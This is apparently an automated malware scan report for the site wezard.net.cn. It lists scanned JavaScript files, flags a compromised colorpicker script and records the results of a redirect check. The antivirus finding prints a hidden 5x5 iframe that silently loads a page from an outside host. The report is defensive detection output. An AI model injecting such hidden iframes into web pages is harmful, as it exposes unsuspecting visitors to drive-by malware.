Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wezard.net.cn
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://wezard.net.cn/ | 200 OK Content-Length: 74975 Content-Type: text/html | clean |
http://wezard.net.cn/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highlight/highlight.js | 200 OK Content-Length: 362 Content-Type: application/javascript | clean |
http://wezard.net.cn/media/system/js/modal.js | 200 OK Content-Length: 10587 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/system/iewarning/js/warning.js | 200 OK Content-Length: 8025 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highslide/highslide-full.packed.js | 200 OK Content-Length: 47447 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highslide/easing_equations.js | 200 OK Content-Length: 9387 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highslide/swfobject.js | 200 OK Content-Length: 9758 Content-Type: application/javascript | clean |
http://wezard.net.cn/plugins/content/highslide/config/js/highslide-sitesettings.js | 200 OK Content-Length: 7714 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/thememagic/media/js/jquery.magic.min.js | 200 OK Content-Length: 57321 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/thememagic/media/js/jquery.tools.min.js | 200 OK Content-Length: 32068 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/thememagic/media/js/colorpicker/js/colorpicker.min.js | 200 OK Content-Length: 13286 Content-Type: application/javascript | malicious |
Malicious code (confirmed by antiviruses, see below):
(function($){var ColorPicker=function(){var ids={},inAction,charMin=65,visible,tpl='<div class="colorpicker"><div class="colorpicker_color"><div><div></div></div></div><div class="colorpicker_hue"><div></div></div><div class="colorpicker_new_color"></div><div class="colorpicker_current_color"></div><div class="colorpicker_hex"><input type="text" maxlength="6" size="6" /></div><div class
Antivirus reports:
Hidden iFrame found. size: 5x5 src: http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8
<iframe src="http://jnvzpp.sellclassics.com/geographicallyconquering.cgi?8" scrolling="auto" frameborder="no" align="center" height="5" width="5">
http://wezard.net.cn/templates/ethos/media/js/jxtcpngfix.js | 200 OK Content-Length: 1013 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/media/js/scripts.js | 200 OK Content-Length: 608 Content-Type: application/javascript | clean |
http://wezard.net.cn/templates/ethos/media/js/jquery.easing.min.js | 200 OK Content-Length: 4756 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wezard.net.cn
Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sat, 04 Oct 2014 18:54:33 GMT
Pragma: no-cache
ETag: 702e5a9801d2f7a5456e3e1cf4c5c93f
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sat, 04 Oct 2014 18:54:34 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 1607e2305a69b6d9a143af64a4fc42e1=ak1t8aiodf3mjk04isjc7r6nh2; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: wezard.net.cn
Referer: http://www.google.com/search?q=wezard.net.cn
Result:
The result is similar to the first query. There are no suspicious redirects found.